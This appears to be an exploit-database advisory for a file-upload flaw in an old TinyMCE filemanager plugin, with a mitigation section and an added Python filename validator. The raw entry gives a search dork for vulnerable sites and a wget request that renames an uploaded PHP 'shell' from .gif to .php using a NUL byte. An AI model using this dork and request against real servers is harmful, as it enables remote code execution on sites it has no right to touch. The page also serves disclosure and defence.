Vendor: TinyMCE
By: Vladimir Vorontsov
CVSS: 8.8 (HIGH)
Title: File Upload Vulnerability
CWE: 434
Product Name: TinyMCE
Affected Version From: 3.2.3
Affected Version To: 3.2.3
Patch Exists: YES
Related CWE: N/A
CPE: tinymce/plugins_filemanager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

File Upload Vulnerability [ Plugins tiny_mce ]

A file upload vulnerability exists in the TinyMCE filemanager plugin that allows an attacker to place malicious files on the server. It is caused by a lack of proper input validation and sanitization of uploaded file names. An attacker can exploit it by uploading a file with PHP content and a .gif extension, then using the file manager's move operation to rename it to a .php extension.

Mitigation:

Input validation and sanitization of file names should be implemented, on both the upload and the file manager's move/rename operation, to prevent malicious files from being uploaded or renamed into server-executable types.
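The following is an added example of the kind of server-side check this mitigation calls for; it is not code from the page, from TinyMCE or from the filemanager plugin. It assumes an image-only upload area (the allowlist, the key names `toname0`, `toname1`, … and the sample move request are constructed here to mirror the shape of the request shown in the raw advisory). The same rule is applied to the upload name and to every rename target, since the advisory's bypass renames an already-uploaded file rather than abusing the upload itself.

```python
import os
import re

# Constructed allowlist: extensions the upload directory may hold (assumption:
# an image-only upload area, like the images/ path in the advisory).
ALLOWED_EXTENSIONS = frozenset({"gif", "jpg", "jpeg", "png"})

# A single filename component: letters, digits, dot, dash, underscore only.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def validate_filename(name: str) -> str:
    """Return `name` unchanged if it is an acceptable upload/rename target,
    otherwise raise ValueError describing the first failed check."""
    if "\x00" in name:
        # Reject NUL before anything else: a filesystem call backed by C string
        # handling would truncate "a.php\x00.gif" to "a.php", so the extension
        # the rest of this function sees is not the one that would be stored.
        raise ValueError("NUL byte in filename")
    if name in (".", "..") or "/" in name or "\\" in name:
        raise ValueError("path separator or dot-directory in filename")
    if not _SAFE_NAME.fullmatch(name):
        raise ValueError("filename contains disallowed characters")
    root, ext = os.path.splitext(name)
    ext = ext.lstrip(".").lower()
    if not root or ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {ext!r} not allowed")
    # Reject double extensions such as "a.php.gif": every inner extension must
    # also be on the allowlist, so a misconfigured handler cannot pick it up.
    for inner in root.split(".")[1:]:
        if inner.lower() not in ALLOWED_EXTENSIONS:
            raise ValueError(f"inner extension {inner!r} not allowed")
    return name


def is_safe_filename(name: str) -> bool:
    """Boolean wrapper around validate_filename()."""
    try:
        validate_filename(name)
        return True
    except ValueError:
        return False


def rejected_move_targets(params: dict) -> list:
    """Given the parameter object of a move/rename request (hypothetical key
    layout: toname0, toname1, ...), return every target name that fails
    validation. An empty list means the whole request may proceed."""
    rejected = []
    for key, value in params.items():
        if key.startswith("toname") and not is_safe_filename(str(value)):
            rejected.append(value)
    return rejected


if __name__ == "__main__":
    # Constructed sample request: one benign rename and one NUL-byte rename.
    sample_params = {
        "frompath0": "{0}/images/a.gif",
        "toname0": "a.php\x00.gif",
        "frompath1": "{0}/images/b.gif",
        "toname1": "b.png",
    }
    bad = rejected_move_targets(sample_params)
    print("rejected targets:", [repr(b) for b in bad])
```

Running the module prints the single rejected target; in a real handler the request would be refused as a whole when the list is non-empty, and the rejection logged with the offending name escaped (`repr`) so that the NUL byte is visible in the log.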

Exploit-DB raw data:

==============================================
File Upload Vulnerability [ Plugins tiny_mce ]
==============================================

http://tinymce.moxiecode.com/plugins_filemanager.php
Major version 3
Minor version 2.2.3

####################################################################

       Author             : Vladimir Vorontsov
       Contact            : d0znpp [at] gmail [dot] com

       Greetz       : GNU
       My Group         : ONSEC Russian Security Team

####################################################################

[~] DORK: inurl:/tiny_mce/plugins/filemanager/

--------------------------------------------------------------------

[~] You go to      :
http://web.com/tiny_mce/plugins/filemanager/pages/fm/index.html
[~] Upload shell   : use PHP content and .gif extension, in example a.gif
[~] Move it 2 .php :
 $ wget
--post-data="json_data=%7B%22method%22%3A%22fm.moveFiles%22%2C%22params%22%3A%5B%7B%22frompath0%22%3A%22%7B0%7D%2Fimages%2F
*a.gif*%22%2C%22toname0%22%3A%22*a.php%00.gif*%22%7D%5D%2C%22id%22%3A%22c0%22%7D"
 http://web.com/tiny_mce/plugins/filemanager/rpc/index.php

####################################################################